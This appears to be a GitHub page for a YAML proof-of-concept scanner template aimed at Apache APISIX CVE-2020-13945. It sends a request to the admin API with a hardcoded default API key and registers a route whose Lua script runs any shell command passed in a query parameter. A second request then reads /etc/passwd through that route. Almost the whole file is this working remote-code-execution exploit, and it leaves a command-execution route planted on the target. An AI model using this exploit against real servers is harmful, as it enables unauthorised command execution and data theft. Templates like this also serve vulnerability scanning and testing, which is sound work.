forked from MeowwBox/pxplan
-
Notifications
You must be signed in to change notification settings - Fork 0
/
yaml-poc-apache-apisix-other-CVE-2020-13945.yml
executable file
·32 lines (32 loc) · 1.31 KB
/
yaml-poc-apache-apisix-other-CVE-2020-13945.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
name: poc-yaml-apache-apisix-cve-2020-13945-rce
binding: 08d4a8b7-1afe-45c5-8ac3-9311ddb30d18
manual: true
detail:
author: Monday
links:
- https://github.com/vulhub/vulhub/blob/e00b6928c5db067c76e30bc96818a96ae47618b5/apisix/CVE-2020-13945/README.zh-cn.md
vulnerability:
id: CT-146369
level: medium
transport: http
set:
s1: randomLowercase(20)
s2: randomLowercase(10)
rules:
r0:
request:
cache: true
method: POST
path: /apisix/admin/routes
headers:
Content-Type: application/json
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
body: "{\r\n\"uri\": \"/{{s1}}\",\r\n\"script\": \"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f = assert(io.popen(args.{{s2}}, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close() \\n end \\nreturn _M\",\r\n\"upstream\": {\r\n\"type\": \"roundrobin\",\r\n\"nodes\": {\r\n\"example.com:80\": 1\r\n}\r\n}\r\n} "
expression: response.status == 201
r1:
request:
cache: true
method: GET
path: /{{s1}}?{{s2}}=cat+/etc/passwd
expression: '"root:[x*]:0:0:".bmatches(response.raw)'
expression: r0() && r1()